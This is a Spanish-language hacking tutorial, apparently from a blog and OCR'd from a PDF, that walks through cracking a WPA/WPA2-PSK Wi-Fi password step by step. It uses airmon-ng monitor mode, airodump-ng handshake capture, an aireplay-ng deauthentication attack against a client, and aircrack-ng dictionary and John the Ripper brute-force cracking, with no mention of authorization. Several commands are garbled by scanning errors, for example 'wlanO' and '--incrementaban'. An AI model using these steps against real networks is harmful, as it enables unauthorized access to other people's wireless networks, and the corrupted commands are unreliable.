1. Introducción: 


En este tutorial les enseñare a crackear WPA / WPA2 / PSK desde cero. En la primera parte 
que fue de como crackear WEPs desde cero vimos como iniciar desde el DVD de Backtrack, 
por lo tanto arrancaremos con la linea de comandos. 

2. Colocando nuestra interface en modo monitor: 

Primero debemos saber como se llama nuestra ¡nterface, para ello tipeamos: 


aimon-ng 
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Como vemos en la imagen, mi interface se llama wlanO. Ahora para ponerla en modo monitor 
tipeamos 


airmon-ng start wlanO 
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Como podemos ver en la imagen 2, nos pone entreparentesis "(monitor mode enabled 
on monO)", que sera la que utilizaremos. 

3. Capturando el Handshake 

La siguiente linea de comando scanneara las redes cercanas: 

airodump-ng monO 
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Como se puede ver, aparece una red llamada ANTRAX que sera la que atacare. 

De este paso debemos tener en cuenta el canal, en este caso es 1. El BSSID y la STATION. 
Una vez que sale la MAC de la red que deseamos atacar con una estación, frenamos el 
scanneo presionando CTRL + C 
Ahora tipearemos la siguiente linea: 

airodump-ng monO --channel 1 --bssid D8:5D:4C:C7:DC:EE -w/tmp/wpa2 
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Seguido a esto nos aparecerá una imagen de la red sin clientes conectados y en otra consola 
tipeamos: 

aireplay-ng -0 1 -a D8:5D:4C:C7:DC:EE -c 70:F1 :A1:94:E8:34 monO 
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Una vez tipeado esto, podremos ver que aparecerán redes en la otra consola y podremos 
capturar el Handshake. 
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Como se puede ver en la imagen 8, hemos capturado el Handshake, ahora lo 
que nos queda es desencriptar la password. Esto se puede hacer de dos 
formas.. 

1 - Bruteándola con el Jonh The Ripper 

2 - Por medio de Diccionario 

En este tutorial veremos las dos Formas 
4. Obteniendo la Clave 

Para hacerla por medio de Aircrack, tipeamos la siguiente linea: 
aircrack-ng -w /pentest/passwords/wordlists/wpa.txt -b D8:5D:4C:C7:DC:EE 

/tmp/wpa2*.cap 
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En este caso estoy utilizando el diccionario que viene con Backtrack. Ustedes pueden utilizar 
sus propios diccionario y corrigen la ruta del mismo. 

Como podran ver, ahi obtuvo la Clave y en este caso es: "thisisatest" 

Ahora veamos la forma de hacerlo por medio de John The Ripper. 

Tipeamos el siguiente comando: 

/pentest/password/jtr/john --stdout --incrementaban | aircrack-ng -b 
D8:5D:4C:C7:DC:EE -w - /tmp/wpa2*.cap 

Recuerden cambiar la MAC por la que están atacando y el directorio si es que lo modificaron. 
Ambos métodos, tanto por diccionario como por John The Ripper suelen demorar dependiendo 
la dificultad de la contraseña. 

5. Despedida: 

Bueno, espero que les haya gustado y les sirva este tutorial y cualquier duda que tengan 
pueden postearla en el blog. 


ANTRAX 









